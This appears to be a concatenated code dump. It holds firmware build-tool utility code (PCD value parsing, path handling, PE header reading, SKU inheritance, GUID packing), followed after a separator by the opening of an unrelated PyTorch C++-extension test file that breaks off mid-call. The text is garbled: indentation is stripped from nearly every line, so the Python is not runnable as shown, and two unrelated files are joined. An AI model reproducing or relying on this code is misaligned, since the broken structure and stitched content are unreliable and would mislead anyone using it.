Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 1:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 1
if Value.startswith(TAB_UINT16) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 2:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 2
if Value.startswith(TAB_UINT32) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 4:
raise BadExpression('Value (%s) Size larger than %d' %(Value, Size))
return Value, 4
if Value.startswith(TAB_UINT64) and Value.endswith(')'):
Value, Size = ParseFieldValue(Value.split('(', 1)[1][:-1])
if Size > 8:
raise BadExpression('Value (%s) Size larger than %d' % (Value, Size))
return Value, 8
if Value.startswith(TAB_GUID) and Value.endswith(')'):
Value = Value.split('(', 1)[1][:-1].strip()
if Value[0] == '{' and Value[-1] == '}':
TmpValue = GuidStructureStringToGuidString(Value)
if not TmpValue:
raise BadExpression("Invalid GUID value string %s" % Value)
Value = TmpValue
if Value[0] == '"' and Value[-1] == '"':
Value = Value[1:-1]
try:
Value = str(uuid.UUID(Value).bytes_le)
if Value.startswith("b'"):
Value = Value[2:-1]
Value = "'" + Value + "'"
except ValueError as Message:
raise BadExpression(Message)
Value, Size = ParseFieldValue(Value)
return Value, 16
if Value.startswith('L"') and Value.endswith('"'):
# Unicode String
# translate escape character
Value = Value[1:]
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, (len(List) + 1) * 2
if Value.startswith('"') and Value.endswith('"'):
# ASCII String
# translate escape character
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List) + 1
if Value.startswith("L'") and Value.endswith("'"):
# Unicode Character Constant
# translate escape character
Value = Value[1:]
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
if len(List) == 0:
raise BadExpression('Length %s is %s' % (Value, len(List)))
List.reverse()
Value = 0
for Char in List:
Value = (Value << 16) | ord(Char)
return Value, len(List) * 2
if Value.startswith("'") and Value.endswith("'"):
# Character constant
# translate escape character
try:
Value = eval(Value)
except:
Value = Value[1:-1]
List = list(Value)
if len(List) == 0:
raise BadExpression('Length %s is %s' % (Value, len(List)))
List.reverse()
Value = 0
for Char in List:
Value = (Value << 8) | ord(Char)
return Value, len(List)
if Value.startswith('{') and Value.endswith('}'):
# Byte array
Value = Value[1:-1]
List = [Item.strip() for Item in Value.split(',')]
List.reverse()
Value = 0
RetSize = 0
for Item in List:
ItemValue, Size = ParseFieldValue(Item)
RetSize += Size
for I in range(Size):
Value = (Value << 8) | ((ItemValue >> 8 * I) & 0xff)
return Value, RetSize
if Value.startswith('DEVICE_PATH(') and Value.endswith(')'):
Value = Value.replace("DEVICE_PATH(", '').rstrip(')')
Value = Value.strip().strip('"')
return ParseDevPathValue(Value)
if Value.lower().startswith('0x'):
try:
Value = int(Value, 16)
except:
raise BadExpression("invalid hex value: %s" % Value)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) // 8
if Value[0].isdigit():
Value = int(Value, 10)
if Value == 0:
return 0, 1
return Value, (Value.bit_length() + 7) // 8
if Value.lower() == 'true':
return 1, 1
if Value.lower() == 'false':
return 0, 1
return Value, 1
## AnalyzeDscPcd
#
# Analyze DSC PCD value, since there is no data type info in DSC
# This function is used to match functions (AnalyzePcdData) used for retrieving PCD value from database
# 1. Feature flag: TokenSpace.PcdCName|PcdValue
# 2. Fix and Patch:TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# 3. Dynamic default:
# TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# TokenSpace.PcdCName|PcdValue
# 4. Dynamic VPD:
# TokenSpace.PcdCName|VpdOffset[|VpdValue]
# TokenSpace.PcdCName|VpdOffset[|MaxSize[|VpdValue]]
# 5. Dynamic HII:
# TokenSpace.PcdCName|HiiString|VariableGuid|VariableOffset[|HiiValue]
# The PCD value needs to be located in such a string, and the PCD value might be an expression in which
# a "|" operator may also appear, including inside string values.
#
# @param Setting: String containing the information described above, with "TokenSpace.PcdCName|" stripped
# @param PcdType: PCD type: feature, fixed, dynamic default, VPD or HII
# @param DataType: The datum type of the PCD: VOID*, UINT, BOOL
# @retval:
# ValueList: A list containing the fields described above
# IsValid: True if the setting conforms to the EBNF above, otherwise False
# Index: The index where PcdValue is in ValueList
#
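# Illustrative example (the setting is made up): for a fixed-at-build VOID* PCD the
# value, datum type and max size are split out, and index 0 marks where the value
# sits in the returned list:
#
#   AnalyzeDscPcd('L"Token"|VOID*|20', MODEL_PCD_FIXED_AT_BUILD)
#   -> (['L"Token"', 'VOID*', '20'], True, 0)
#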
def AnalyzeDscPcd(Setting, PcdType, DataType=''):
FieldList = AnalyzePcdExpression(Setting)
IsValid = True
if PcdType in (MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE, MODEL_PCD_DYNAMIC_DEFAULT, MODEL_PCD_DYNAMIC_EX_DEFAULT):
Value = FieldList[0]
Size = ''
if len(FieldList) > 1 and FieldList[1]:
DataType = FieldList[1]
if FieldList[1] != TAB_VOID and StructPattern.match(FieldList[1]) is None:
IsValid = False
if len(FieldList) > 2:
Size = FieldList[2]
if IsValid:
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size, 16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [str(Value), DataType, str(Size)], IsValid, 0
elif PcdType == MODEL_PCD_FEATURE_FLAG:
Value = FieldList[0]
Size = ''
IsValid = (len(FieldList) <= 1)
return [Value, DataType, str(Size)], IsValid, 0
elif PcdType in (MODEL_PCD_DYNAMIC_VPD, MODEL_PCD_DYNAMIC_EX_VPD):
VpdOffset = FieldList[0]
Value = Size = ''
if not DataType == TAB_VOID:
if len(FieldList) > 1:
Value = FieldList[1]
else:
if len(FieldList) > 1:
Size = FieldList[1]
if len(FieldList) > 2:
Value = FieldList[2]
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size, 16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [VpdOffset, str(Size), Value], IsValid, 2
elif PcdType in (MODEL_PCD_DYNAMIC_HII, MODEL_PCD_DYNAMIC_EX_HII):
IsValid = (3 <= len(FieldList) <= 5)
HiiString = FieldList[0]
Guid = Offset = Value = Attribute = ''
if len(FieldList) > 1:
Guid = FieldList[1]
if len(FieldList) > 2:
Offset = FieldList[2]
if len(FieldList) > 3:
Value = FieldList[3]
if len(FieldList) > 4:
Attribute = FieldList[4]
return [HiiString, Guid, Offset, Value, Attribute], IsValid, 3
return [], False, 0
## AnalyzePcdData
#
# Analyze the PCD Value, Datum type and TokenNumber.
# Used to avoid split issues when the value string contains the "|" character
#
# @param[in] Setting: A string containing value/datum type/token number information;
#
# @retval ValueList: A list containing value, datum type and token number.
#
def AnalyzePcdData(Setting):
ValueList = ['', '', '']
ValueRe = re.compile(r'^\s*L?\".*\|.*\"')
PtrValue = ValueRe.findall(Setting)
ValueUpdateFlag = False
if len(PtrValue) >= 1:
Setting = re.sub(ValueRe, '', Setting)
ValueUpdateFlag = True
TokenList = Setting.split(TAB_VALUE_SPLIT)
ValueList[0:len(TokenList)] = TokenList
if ValueUpdateFlag:
ValueList[0] = PtrValue[0]
return ValueList
## Check format of a PCD value against its datum type
#
# For PCD value setting
#
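# Illustrative examples (values are made up):
#
#   CheckPcdDatum('BOOLEAN', 'TRUE')  -> (True, "")
#   CheckPcdDatum('UINT8', '0x1FF')   -> (False, "Too large PCD value...")
#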
def CheckPcdDatum(Type, Value):
if Type == TAB_VOID:
ValueRe = re.compile(r'\s*L?\".*\"\s*$')
if not (((Value.startswith('L"') or Value.startswith('"')) and Value.endswith('"'))
or (Value.startswith('{') and Value.endswith('}')) or (Value.startswith("L'") or Value.startswith("'") and Value.endswith("'"))
):
return False, "Invalid value [%s] of type [%s]; must be in the form of {...} for array"\
", \"...\" or \'...\' for string, L\"...\" or L\'...\' for unicode string" % (Value, Type)
elif ValueRe.match(Value):
# Check the chars in UnicodeString or CString is printable
if Value.startswith("L"):
Value = Value[2:-1]
else:
Value = Value[1:-1]
Printset = set(string.printable)
Printset.remove(TAB_PRINTCHAR_VT)
Printset.add(TAB_PRINTCHAR_BS)
Printset.add(TAB_PRINTCHAR_NUL)
if not set(Value).issubset(Printset):
PrintList = sorted(Printset)
return False, "Invalid PCD string value of type [%s]; must be printable chars %s." % (Type, PrintList)
elif Type == 'BOOLEAN':
if Value not in ['TRUE', 'True', 'true', '0x1', '0x01', '1', 'FALSE', 'False', 'false', '0x0', '0x00', '0']:
return False, "Invalid value [%s] of type [%s]; must be one of TRUE, True, true, 0x1, 0x01, 1"\
", FALSE, False, false, 0x0, 0x00, 0" % (Value, Type)
elif Type in [TAB_UINT8, TAB_UINT16, TAB_UINT32, TAB_UINT64]:
if Value.startswith('0') and not Value.lower().startswith('0x') and len(Value) > 1 and Value.lstrip('0'):
Value = Value.lstrip('0')
try:
if Value and int(Value, 0) < 0:
return False, "PCD can't be set to negative value[%s] for datum type [%s]" % (Value, Type)
Value = int(Value, 0)
if Value > MAX_VAL_TYPE[Type]:
return False, "Too large PCD value[%s] for datum type [%s]" % (Value, Type)
except:
return False, "Invalid value [%s] of type [%s];"\
" must be a hexadecimal, decimal or octal in C language format." % (Value, Type)
else:
return True, "StructurePcd"
return True, ""
def CommonPath(PathList):
P1 = min(PathList).split(os.path.sep)
P2 = max(PathList).split(os.path.sep)
for Index in range(min(len(P1), len(P2))):
if P1[Index] != P2[Index]:
return os.path.sep.join(P1[:Index])
return os.path.sep.join(P1)
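# Illustrative example (paths are made up, POSIX separator assumed):
#
#   CommonPath(['/ws/PkgA/Module.inf', '/ws/PkgB/Lib.inf'])  -> '/ws'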
class PathClass(object):
def __init__(self, File='', Root='', AlterRoot='', Type='', IsBinary=False,
Arch='COMMON', ToolChainFamily='', Target='', TagName='', ToolCode=''):
self.Arch = Arch
self.File = str(File)
if os.path.isabs(self.File):
self.Root = ''
self.AlterRoot = ''
else:
self.Root = str(Root)
self.AlterRoot = str(AlterRoot)
# Remove any '.' and '..' in path
if self.Root:
self.Root = mws.getWs(self.Root, self.File)
self.Path = os.path.normpath(os.path.join(self.Root, self.File))
self.Root = os.path.normpath(CommonPath([self.Root, self.Path]))
# eliminate the side-effect of 'C:'
if self.Root[-1] == ':':
self.Root += os.path.sep
# file path should not start with path separator
if self.Root[-1] == os.path.sep:
self.File = self.Path[len(self.Root):]
else:
self.File = self.Path[len(self.Root) + 1:]
else:
self.Path = os.path.normpath(self.File)
self.SubDir, self.Name = os.path.split(self.File)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.Root:
if self.SubDir:
self.Dir = os.path.join(self.Root, self.SubDir)
else:
self.Dir = self.Root
else:
self.Dir = self.SubDir
if IsBinary:
self.Type = Type
else:
self.Type = self.Ext.lower()
self.IsBinary = IsBinary
self.Target = Target
self.TagName = TagName
self.ToolCode = ToolCode
self.ToolChainFamily = ToolChainFamily
## Convert the object of this class to a string
#
# Convert member Path of the class to a string
#
# @retval string Formatted String
#
def __str__(self):
return self.Path
## Override __eq__ function
#
# Check whether PathClass are the same
#
# @retval False The two PathClass are different
# @retval True The two PathClass are the same
#
def __eq__(self, Other):
return self.Path == str(Other)
## Override __cmp__ function
#
# Customize the comparison operation of two PathClass
#
# @retval 0 The two PathClass are different
# @retval -1 The first PathClass is less than the second PathClass
# @retval 1 The first PathClass is Bigger than the second PathClass
def __cmp__(self, Other):
OtherKey = str(Other)
SelfKey = self.Path
if SelfKey == OtherKey:
return 0
elif SelfKey > OtherKey:
return 1
else:
return -1
## Override __hash__ function
#
# Use Path as key in hash table
#
# @retval string Key for hash table
#
def __hash__(self):
return hash(self.Path)
@cached_property
def Key(self):
return self.Path.upper()
@property
def TimeStamp(self):
return os.stat(self.Path)[8]
def Validate(self, Type='', CaseSensitive=True):
def RealPath2(File, Dir='', OverrideDir=''):
NewFile = None
if OverrideDir:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile:
if OverrideDir[-1] == os.path.sep:
return NewFile[len(OverrideDir):], NewFile[0:len(OverrideDir)]
else:
return NewFile[len(OverrideDir) + 1:], NewFile[0:len(OverrideDir)]
if GlobalData.gAllFiles:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(Dir, File))]
if not NewFile:
NewFile = os.path.normpath(os.path.join(Dir, File))
if not os.path.exists(NewFile):
return None, None
if NewFile:
if Dir:
if Dir[-1] == os.path.sep:
return NewFile[len(Dir):], NewFile[0:len(Dir)]
else:
return NewFile[len(Dir) + 1:], NewFile[0:len(Dir)]
else:
return NewFile, ''
return None, None
if GlobalData.gCaseInsensitive:
CaseSensitive = False
if Type and Type.lower() != self.Type:
return FILE_TYPE_MISMATCH, '%s (expect %s but got %s)' % (self.File, Type, self.Type)
RealFile, RealRoot = RealPath2(self.File, self.Root, self.AlterRoot)
if not RealRoot and not RealFile:
RealFile = self.File
if self.AlterRoot:
RealFile = os.path.join(self.AlterRoot, self.File)
elif self.Root:
RealFile = os.path.join(self.Root, self.File)
if len (mws.getPkgPath()) == 0:
return FILE_NOT_FOUND, os.path.join(self.AlterRoot, RealFile)
else:
return FILE_NOT_FOUND, "%s is not found in packages path:\n\t%s" % (self.File, '\n\t'.join(mws.getPkgPath()))
ErrorCode = 0
ErrorInfo = ''
if RealRoot != self.Root or RealFile != self.File:
if CaseSensitive and (RealFile != self.File or (RealRoot != self.Root and RealRoot != self.AlterRoot)):
ErrorCode = FILE_CASE_MISMATCH
ErrorInfo = self.File + '\n\t' + RealFile + " [in file system]"
self.SubDir, self.Name = os.path.split(RealFile)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.SubDir:
self.Dir = os.path.join(RealRoot, self.SubDir)
else:
self.Dir = RealRoot
self.File = RealFile
self.Root = RealRoot
self.Path = os.path.join(RealRoot, RealFile)
return ErrorCode, ErrorInfo
## Parse PE image to get the required PE information.
#
class PeImageClass():
## Constructor
#
# @param File FilePath of PeImage
#
def __init__(self, PeFile):
self.FileName = PeFile
self.IsValid = False
self.Size = 0
self.EntryPoint = 0
self.SectionAlignment = 0
self.SectionHeaderList = []
self.ErrorInfo = ''
try:
PeObject = open(PeFile, 'rb')
except:
self.ErrorInfo = self.FileName + ' can not be found\n'
return
# Read DOS header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x3E)
ByteList = ByteArray.tolist()
# DOS signature should be 'MZ'
if self._ByteListToStr (ByteList[0x0:0x2]) != 'MZ':
self.ErrorInfo = self.FileName + ' has no valid DOS signature MZ'
return
# Read 4 byte PE Signature
PeOffset = self._ByteListToInt(ByteList[0x3C:0x3E])
PeObject.seek(PeOffset)
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 4)
# PE signature should be 'PE\0\0'
if ByteArray.tostring() != b'PE\0\0':
self.ErrorInfo = self.FileName + ' has no valid PE signature PE00'
return
# Read PE file header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x14)
ByteList = ByteArray.tolist()
SecNumber = self._ByteListToInt(ByteList[0x2:0x4])
if SecNumber == 0:
self.ErrorInfo = self.FileName + ' has no section header'
return
# Read PE optional header
OptionalHeaderSize = self._ByteListToInt(ByteArray[0x10:0x12])
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, OptionalHeaderSize)
ByteList = ByteArray.tolist()
self.EntryPoint = self._ByteListToInt(ByteList[0x10:0x14])
self.SectionAlignment = self._ByteListToInt(ByteList[0x20:0x24])
self.Size = self._ByteListToInt(ByteList[0x38:0x3C])
# Read each Section Header
for Index in range(SecNumber):
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x28)
ByteList = ByteArray.tolist()
SecName = self._ByteListToStr(ByteList[0:8])
SecVirtualSize = self._ByteListToInt(ByteList[8:12])
SecRawAddress = self._ByteListToInt(ByteList[20:24])
SecVirtualAddress = self._ByteListToInt(ByteList[12:16])
self.SectionHeaderList.append((SecName, SecVirtualAddress, SecRawAddress, SecVirtualSize))
self.IsValid = True
PeObject.close()
def _ByteListToStr(self, ByteList):
String = ''
for index in range(len(ByteList)):
if ByteList[index] == 0:
break
String += chr(ByteList[index])
return String
def _ByteListToInt(self, ByteList):
Value = 0
for index in range(len(ByteList) - 1, -1, -1):
Value = (Value << 8) | int(ByteList[index])
return Value
class DefaultStore():
def __init__(self, DefaultStores ):
self.DefaultStores = DefaultStores
def DefaultStoreID(self, DefaultStoreName):
for key, value in self.DefaultStores.items():
if value == DefaultStoreName:
return key
return None
def GetDefaultDefault(self):
if not self.DefaultStores or "0" in self.DefaultStores:
return "0", TAB_DEFAULT_STORES_DEFAULT
else:
minvalue = min(int(value_str) for value_str in self.DefaultStores)
return (str(minvalue), self.DefaultStores[str(minvalue)])
def GetMin(self, DefaultSIdList):
if not DefaultSIdList:
return TAB_DEFAULT_STORES_DEFAULT
storeidset = {storeid for storeid, storename in self.DefaultStores.values() if storename in DefaultSIdList}
if not storeidset:
return ""
minid = min(storeidset )
for sid, name in self.DefaultStores.values():
if sid == minid:
return name
class SkuClass():
DEFAULT = 0
SINGLE = 1
MULTIPLE =2
def __init__(self,SkuIdentifier='', SkuIds=None):
if SkuIds is None:
SkuIds = {}
for SkuName in SkuIds:
SkuId = SkuIds[SkuName][0]
skuid_num = int(SkuId, 16) if SkuId.upper().startswith("0X") else int(SkuId)
if skuid_num > 0xFFFFFFFFFFFFFFFF:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] value %s exceeds the max value of UINT64"
% (SkuName, SkuId))
self.AvailableSkuIds = OrderedDict()
self.SkuIdSet = []
self.SkuIdNumberSet = []
self.SkuData = SkuIds
self._SkuInherit = {}
self._SkuIdentifier = SkuIdentifier
if SkuIdentifier == '' or SkuIdentifier is None:
self.SkuIdSet = ['DEFAULT']
self.SkuIdNumberSet = ['0U']
elif SkuIdentifier == 'ALL':
self.SkuIdSet = list(SkuIds.keys())
self.SkuIdNumberSet = [num[0].strip() + 'U' for num in SkuIds.values()]
else:
r = SkuIdentifier.split('|')
self.SkuIdSet=[(r[k].strip()).upper() for k in range(len(r))]
k = None
try:
self.SkuIdNumberSet = [SkuIds[k][0].strip() + 'U' for k in self.SkuIdSet]
except Exception:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (k, " | ".join(SkuIds.keys())))
for each in self.SkuIdSet:
if each in SkuIds:
self.AvailableSkuIds[each] = SkuIds[each][0]
else:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData="SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (each, " | ".join(SkuIds.keys())))
if self.SkuUsageType != SkuClass.SINGLE:
self.AvailableSkuIds.update({'DEFAULT':0, 'COMMON':0})
if self.SkuIdSet:
GlobalData.gSkuids = (self.SkuIdSet)
if 'COMMON' in GlobalData.gSkuids:
GlobalData.gSkuids.remove('COMMON')
if self.SkuUsageType == self.SINGLE:
if len(GlobalData.gSkuids) != 1:
if 'DEFAULT' in GlobalData.gSkuids:
GlobalData.gSkuids.remove('DEFAULT')
if GlobalData.gSkuids:
GlobalData.gSkuids.sort()
def GetNextSkuId(self, skuname):
if not self._SkuInherit:
self._SkuInherit = {}
for item in self.SkuData.values():
self._SkuInherit[item[1]]=item[2] if item[2] else "DEFAULT"
return self._SkuInherit.get(skuname, "DEFAULT")
def GetSkuChain(self, sku):
if sku == "DEFAULT":
return ["DEFAULT"]
skulist = [sku]
nextsku = sku
while True:
nextsku = self.GetNextSkuId(nextsku)
skulist.append(nextsku)
if nextsku == "DEFAULT":
break
skulist.reverse()
return skulist
def SkuOverrideOrder(self):
skuorderset = []
for skuname in self.SkuIdSet:
skuorderset.append(self.GetSkuChain(skuname))
skuorder = []
for index in range(max(len(item) for item in skuorderset)):
for subset in skuorderset:
if index > len(subset)-1:
continue
if subset[index] in skuorder:
continue
skuorder.append(subset[index])
return skuorder
@property
def SkuUsageType(self):
if self._SkuIdentifier.upper() == "ALL":
return SkuClass.MULTIPLE
if len(self.SkuIdSet) == 1:
if self.SkuIdSet[0] == 'DEFAULT':
return SkuClass.DEFAULT
return SkuClass.SINGLE
if len(self.SkuIdSet) == 2 and 'DEFAULT' in self.SkuIdSet:
return SkuClass.SINGLE
return SkuClass.MULTIPLE
def DumpSkuIdArrary(self):
if self.SkuUsageType == SkuClass.SINGLE:
return "{0x0}"
ArrayStrList = []
for skuname in self.AvailableSkuIds:
if skuname == "COMMON":
continue
while skuname != "DEFAULT":
ArrayStrList.append(hex(int(self.AvailableSkuIds[skuname])))
skuname = self.GetNextSkuId(skuname)
ArrayStrList.append("0x0")
return "{{{myList}}}".format(myList=",".join(ArrayStrList))
@property
def AvailableSkuIdSet(self):
return self.AvailableSkuIds
@property
def SystemSkuId(self):
if self.SkuUsageType == SkuClass.SINGLE:
if len(self.SkuIdSet) == 1:
return self.SkuIdSet[0]
else:
return self.SkuIdSet[0] if self.SkuIdSet[0] != 'DEFAULT' else self.SkuIdSet[1]
else:
return 'DEFAULT'
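# Illustrative usage sketch (never called): shows how SkuClass above resolves an
# inheritance chain. The SkuIds mapping is an assumed example of the
# {name: (id, name, parent)} shape consumed by __init__, not data from any real
# platform; it relies on the BaseTools imports (EdkLogger, GlobalData) used above.
def _SkuClassUsageSketch():
    ExampleSkuIds = {
        'DEFAULT': ('0', 'DEFAULT', ''),
        'SKUA': ('1', 'SKUA', 'DEFAULT'),
        'SKUB': ('2', 'SKUB', 'SKUA'),
    }
    Skus = SkuClass('SKUB', ExampleSkuIds)
    # SKUB inherits from SKUA, which inherits from DEFAULT.
    assert Skus.GetSkuChain('SKUB') == ['DEFAULT', 'SKUA', 'SKUB']
    assert Skus.SkuUsageType == SkuClass.SINGLE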
## Get the integer value from string like "14U" or integer like 2
#
# @param Input The object that may be either an integer value or a string
#
# @retval Value The integer value that the input represents
#
def GetIntegerValue(Input):
if not isinstance(Input, str):
return Input
String = Input
if String.endswith("U"):
String = String[:-1]
if String.endswith("ULL"):
String = String[:-3]
if String.endswith("LL"):
String = String[:-2]
if String.startswith("0x") or String.startswith("0X"):
return int(String, 16)
elif String == '':
return 0
else:
return int(String)
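# Illustrative sketch (never called): expected behavior of GetIntegerValue above
# for the suffix and base forms it handles. The literal inputs are assumed examples.
def _GetIntegerValueExamples():
    assert GetIntegerValue("14U") == 14
    assert GetIntegerValue("8ULL") == 8
    assert GetIntegerValue("0x10") == 16
    assert GetIntegerValue("") == 0
    assert GetIntegerValue(2) == 2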
#
# Pack a GUID (registry format) list into a buffer and return it
#
def PackGUID(Guid):
return pack(PACK_PATTERN_GUID,
int(Guid[0], 16),
int(Guid[1], 16),
int(Guid[2], 16),
int(Guid[3][-4:-2], 16),
int(Guid[3][-2:], 16),
int(Guid[4][-12:-10], 16),
int(Guid[4][-10:-8], 16),
int(Guid[4][-8:-6], 16),
int(Guid[4][-6:-4], 16),
int(Guid[4][-4:-2], 16),
int(Guid[4][-2:], 16)
)
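# Illustrative sketch (never called): PackGUID above expects the five fields of a
# registry-format GUID, e.g. the result of splitting the string on '-'. The GUID
# value is an assumed example; PACK_PATTERN_GUID comes from this module's imports.
def _PackGUIDExample():
    RegistryGuid = '12345678-1234-5678-9ABC-DEF012345678'
    return PackGUID(RegistryGuid.split('-'))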
#
# Pack a GUID (byte) list into a buffer and return it
#
def PackByteFormatGUID(Guid):
return pack(PACK_PATTERN_GUID,
Guid[0],
Guid[1],
Guid[2],
Guid[3],
Guid[4],
Guid[5],
Guid[6],
Guid[7],
Guid[8],
Guid[9],
Guid[10],
)
## DeepCopy dict/OrderedDict recursively
#
# @param ori_dict a nested dict or ordereddict
#
# @retval new dict or OrderedDict
#
def CopyDict(ori_dict):
dict_type = ori_dict.__class__
if dict_type not in (dict,OrderedDict):
return ori_dict
new_dict = dict_type()
for key in ori_dict:
if isinstance(ori_dict[key],(dict,OrderedDict)):
new_dict[key] = CopyDict(ori_dict[key])
else:
new_dict[key] = ori_dict[key]
return new_dict
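# Illustrative sketch (never called): CopyDict above deep-copies nested
# dict/OrderedDict values, so mutating the copy leaves the original untouched.
# The sample data is an assumed example.
def _CopyDictExample():
    Original = OrderedDict()
    Original['Pcds'] = {'TokenA': '1'}
    Copy = CopyDict(Original)
    Copy['Pcds']['TokenA'] = '2'
    assert Original['Pcds']['TokenA'] == '1'
    assert isinstance(Copy, OrderedDict)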
#
# Remove the c/c++ comments: // and /* */
#
def RemoveCComments(ctext):
    return re.sub(r'//.*?\n|/\*.*?\*/', '\n', ctext, flags=re.S)
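# Illustrative sketch (never called): RemoveCComments above strips both line and
# block comments while keeping the remaining source text. The C snippet is an
# assumed example.
def _RemoveCCommentsExample():
    Source = 'int a; // line comment\nint b; /* block\ncomment */ int c;\n'
    Cleaned = RemoveCComments(Source)
    assert '//' not in Cleaned and '/*' not in Cleaned
    assert 'int a;' in Cleaned and 'int c;' in Cleaned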
|
test_cpp_extensions_jit.py
|
# Owner(s): ["module: cpp-extensions"]
import os
import shutil
import sys
import unittest
import warnings
import re
import tempfile
import subprocess
import glob
import textwrap
from multiprocessing import Process
import torch.testing._internal.common_utils as common
import torch
import torch.backends.cudnn
import torch.utils.cpp_extension
from torch.utils.cpp_extension import CUDA_HOME, ROCM_HOME
from torch.testing._internal.common_utils import gradcheck, TEST_WITH_ASAN, has_breakpad
TEST_CUDA = torch.cuda.is_available() and CUDA_HOME is not None
TEST_CUDNN = False
TEST_ROCM = torch.cuda.is_available() and torch.version.hip is not None and ROCM_HOME is not None
if TEST_CUDA and torch.version.cuda is not None:  # skip the CUDNN test for ROCm
CUDNN_HEADER_EXISTS = os.path.isfile(os.path.join(CUDA_HOME, "include/cudnn.h"))
TEST_CUDNN = (
TEST_CUDA and CUDNN_HEADER_EXISTS and torch.backends.cudnn.is_available()
)
IS_WINDOWS = sys.platform == "win32"
def remove_build_path():
if sys.platform == "win32":
print("Not wiping extensions build folder because Windows")
return
default_build_root = torch.utils.cpp_extension.get_default_build_root()
if os.path.exists(default_build_root):
shutil.rmtree(default_build_root)
class TestCppExtensionJIT(common.TestCase):
"""Tests just-in-time cpp extensions.
Don't confuse this with the PyTorch JIT (aka TorchScript).
"""
def setUp(self):
super().setUp()
# cpp extensions use relative paths. Those paths are relative to
# this file, so we'll change the working directory temporarily
self.old_working_dir = os.getcwd()
os.chdir(os.path.dirname(os.path.abspath(__file__)))
def tearDown(self):
super().tearDown()
# return the working directory (see setUp)
os.chdir(self.old_working_dir)
@classmethod
def setUpClass(cls):
remove_build_path()
@classmethod
def tearDownClass(cls):
remove_build_path()
def test_jit_compile_extension(self):
module = torch.utils.cpp_extension.load(
name="jit_extension",
sources=[
"cpp_extensions/jit_extension.cpp",
"cpp_extensions/jit_extension2.cpp",
],
extra_include_paths=["cpp_extensions"],
extra_cflags=["-g"],
verbose=True,
)
x = torch.randn(4, 4)
y = torch.randn(4, 4)
z = module.tanh_add(x, y)
self.assertEqual(z, x.tanh() + y.tanh())
        # Checking we can call a method not defined in the main C++ file.
z = module.exp_add(x, y)
self.assertEqual(z, x.exp() + y.exp())
# Checking we can use this JIT-compiled class.
doubler = module.Doubler(2, 2)
self.assertIsNone(doubler.get().grad)
self.assertEqual(doubler.get().sum(), 4)
self.assertEqual(doubler.forward().sum(), 8)
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_jit_cuda_extension(self):
# NOTE: The name of the extension must equal the name of the module.
module = torch.utils.cpp_extension.load(
name="torch_test_cuda_extension",
sources=[
"cpp_extensions/cuda_extension.cpp",
"cpp_extensions/cuda_extension.cu",
],
extra_cuda_cflags=["-O2"],
verbose=True,
keep_intermediates=False,
)
x = torch.zeros(100, device="cuda", dtype=torch.float32)
y = torch.zeros(100, device="cuda", dtype=torch.float32)
z = module.sigmoid_add(x, y).cpu()
# 2 * sigmoid(0) = 2 * 0.5 = 1
self.assertEqual(z, torch.ones_like(z))
def _run_jit_cuda_archflags(self, flags, expected):
# Compile an extension with given `flags`
def _check_cuobjdump_output(expected_values, is_ptx=False):
elf_or_ptx = '--list-ptx' if is_ptx else '--list-elf'
lib_ext = '.pyd' if IS_WINDOWS else '.so'
            # Note: the extension name may include _v1, _v2, so first find the exact name
ext_filename = glob.glob(os.path.join(temp_dir,
'cudaext_archflag*' + lib_ext))[0]
command = ['cuobjdump', elf_or_ptx, ext_filename]
p = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output, err = p.communicate()
output = output.decode("ascii")
err = err.decode("ascii")
if not p.returncode == 0 or not err == '':
raise AssertionError("Flags: {}\nReturncode: {}\nStderr: {}\n"
"Output: {} ".format(flags, p.returncode,
err, output))
actual_arches = sorted(re.findall(r'sm_\d\d', output))
expected_arches = sorted(['sm_' + xx for xx in expected_values])
self.assertEqual(actual_arches, expected_arches,
msg="Flags: {}, Actual: {}, Expected: {}\n"
"Stderr: {}\nOutput: {}".format(
flags, actual_arches, expected_arches,
err, output))
temp_dir = tempfile.mkdtemp()
old_envvar = os.environ.get('TORCH_CUDA_ARCH_LIST', None)
try:
os.environ['TORCH_CUDA_ARCH_LIST'] = flags
torch.utils.cpp_extension.load(
name="cudaext_archflags",
sources=[
"cpp_extensions/cuda_extension.cpp",
"cpp_extensions/cuda_extension.cu",
],
extra_cuda_cflags=["-O2"],
